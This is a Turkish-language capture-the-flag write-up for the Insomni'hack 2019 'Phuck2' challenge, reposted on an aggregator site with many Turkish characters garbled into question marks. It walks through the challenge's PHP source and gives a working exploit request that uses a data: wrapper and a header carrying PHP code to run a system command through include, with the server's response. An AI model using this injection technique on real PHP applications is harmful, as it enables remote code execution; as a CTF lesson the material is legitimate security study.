码迷,mamicode.com
首页 > 其他好文 > 详细

Phuck2 – Insomni’hack 2019

时间:2019-08-25 19:55:11      阅读:361      评论:0      收藏:0      [点我收藏+]

标签:htm   url   protoc   utf-8   figure   mem   amp   arch   ams   

原文引用https://www.dazhuanlan.com/2019/08/25/5d625a00a9ecb/


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
 

    stream_wrapper_unregister(‘php‘);
    if(isset($_GET[‘hl‘])) highlight_file(__FILE__);

    $mkdir = function($dir) {
        system(‘mkdir -- ‘.escapeshellarg($dir));
    };

    $randFolder = bin2hex(random_bytes(16));
    $mkdir(‘users/‘.$randFolder);
    chdir(‘users/‘.$randFolder);

    $userFolder = (isset($_SERVER[‘HTTP_X_FORWARDED_FOR‘]) ? $_SERVER[‘HTTP_X_FORWARDED_FOR‘] : $_SERVER[‘REMOTE_ADDR‘]);
    $userFolder = basename(str_replace([‘.‘,‘-‘],[‘‘,‘‘],$userFolder));

    $mkdir($userFolder);
    chdir($userFolder);
    file_put_contents(‘profile‘,print_r($_SERVER,true));
    chdir(‘..‘);

    $_GET[‘page‘]=str_replace(‘.‘,‘‘,$_GET[‘page‘]);
    if(!stripos(file_get_contents($_GET[‘page‘]),‘<?‘) && !stripos(file_get_contents($_GET[‘page‘]),‘php‘)) {
        include($_GET[‘page‘]);
    }

    chdir(__DIR__);
    system(‘rm -rf users/‘.$randFolder);

Kodun analizi

1
 
stream_wrapper_unregister(‘php‘);

php:// wrapper?n? kay?td??? ediyoruz.

1
2
3
 
$mkdir = function($dir) {
    system(‘mkdir -- ‘.escapeshellarg($dir));
};

escapeshellarg ifadesini ge?emeyece?imiz i?in bura ile u?ra?mam?za gerek yok

1
2
3
 
$randFolder = bin2hex(random_bytes(16));
$mkdir(‘users/‘.$randFolder);
chdir(‘users/‘.$randFolder);

Kullan?c?ya ?zel random bir klas?r olu?turup dizini de?i?tiriyor.

1
2
 
$userFolder = (isset($_SERVER[‘HTTP_X_FORWARDED_FOR‘]) ? $_SERVER[‘HTTP_X_FORWARDED_FOR‘] : $_SERVER[‘REMOTE_ADDR‘]);
$userFolder = basename(str_replace([‘.‘,‘-‘],[‘‘,‘‘],$userFolder));

X-Forwarded-For headeri set edilmi? ise headerin de?erini, edilmemi? ise kullan?nc?n(bizim) IP adresimizi $userFolder de?i?kenine at?yor.

$userFolder de?i?kenindeki de?erin varsa noktalar?, tire ve bo?luk karakterlerini -siliyor- ‘’ ile de?i?tiriyor. (“127.0.0 .1” -> “127001” gibi)

1
2
3
4
 
$mkdir($userFolder);
chdir($userFolder);
file_put_contents(‘profile‘,print_r($_SERVER,true));
chdir(‘..‘);

$userFolder de?eri ile klas?r a?ar ve o klas?rün i?ine profile adl? dosyaya $_SERVER arrayinin i?eri?ini yazar.

1
2
3
4
5
6
7
8
 
$_GET[‘page‘]=str_replace(‘.‘,‘‘,$_GET[‘page‘]);

if(!stripos(file_get_contents($_GET[‘page‘]),‘<?‘) && !stripos(file_get_contents($_GET[‘page‘]),‘php‘)) {
    include($_GET[‘page‘]);
}

chdir(__DIR__);
system(‘rm -rf users/‘.$randFolder);

GET ile yollad???m?z page de?erindeki noktalar? siliyor ve file_get_contents($page) ile a?t???m?z dosyan?n i?inde stripos ile dosyan?n i?erisinde <? veya php kelimelerinin ge?ip ge?medi?ini kontrol ediyor.

Daha sonra dosyay? siliyor

Phpinfo

Directive Local Value Master Value
allow_url_fopen On On
allow_url_include Off Off

Oldu?unu g?rüyoruz bunun anlam? include i?erisinde url ve baz? wrapperler ?al??mayacak.

??züm

data:,xx/profile diye veri yollad???m?z zaman allow_url_fopen ve allow_url_include‘dan dolay?;

1
2
3
 
# --> d?ndürdü?ü(return) de?erini ifade edecek
file_get_contents(‘data:,xx/profile‘); --> string ‘xx/profile‘
include(‘data:,xx/profile‘);           --> ‘data:,xx/profile‘ ad?na sahip dosyas?n?n i?eri?i

data wrapperi file_get_contents‘te ?al???rken include‘ta ?al??mad?.

yani;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
 
GET /?page=data:,xx/profile HTTP/1.1
X-Forwarded-For: data:,xx
Get-Flag: <?php system(‘/get_flag‘); ?>
Host: phuck.teaser.insomnihack.ch


HTTP/1.1 200 OK
Date: Sun, 20 Jan 2019 20:16:13 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: User-Agent,Accept-Encoding
Content-Length: 1101
Content-Type: text/html; charset=UTF-8

Array
(
    [HTTP_X_FORWARDED_FOR] => data:,xx
    [HTTP_GET_FLAG] => INS{PhP_UrL_Phuck3rY_h3h3!}
    [HTTP_HOST] => phuck.teaser.insomnihack.ch
    [PATH] => /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    [SERVER_SIGNATURE] => <address>Apache/2.4.29 (Ubuntu) Server at phuck.teaser.insomnihack.ch Port 80</address>

    [SERVER_SOFTWARE] => Apache/2.4.29 (Ubuntu)
    [SERVER_NAME] => phuck.teaser.insomnihack.ch
    [SERVER_ADDR] => 172.17.0.2
    [SERVER_PORT] => 80
    [REMOTE_ADDR] => **CENSORED**
    [DOCUMENT_ROOT] => /var/www/html/
    [REQUEST_SCHEME] => http
    [CONTEXT_PREFIX] => 
    [CONTEXT_DOCUMENT_ROOT] => /var/www/html/
    [SERVER_ADMIN] => [no address given]
    [SCRIPT_FILENAME] => /var/www/html/index.php
    [REMOTE_PORT] => 42696
    [GATEWAY_INTERFACE] => CGI/1.1
    [SERVER_PROTOCOL] => HTTP/1.1
    [REQUEST_METHOD] => GET
    [QUERY_STRING] => page=data:,xx/profile
    [REQUEST_URI] => /?page=data:,xx/profile
    [SCRIPT_NAME] => /index.php
    [PHP_SELF] => /index.php
    [REQUEST_TIME_FLOAT] => 1548015373.641
    [REQUEST_TIME] => 1548015373
)

Ve flag INS{PhP_UrL_Phuck3rY_h3h3!}

NOT: Soruyu CTF s?ras?nca ??zmü? olmay?p, CTF sornas? IRC’den verilen bilgiler (Blaklis taraf?ndan) yard?m? ile yaz?lm??t?r

Phuck2 – Insomni’hack 2019

标签:htm   url   protoc   utf-8   figure   mem   amp   arch   ams   

原文地址:https://www.cnblogs.com/petewell/p/11408852.html
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!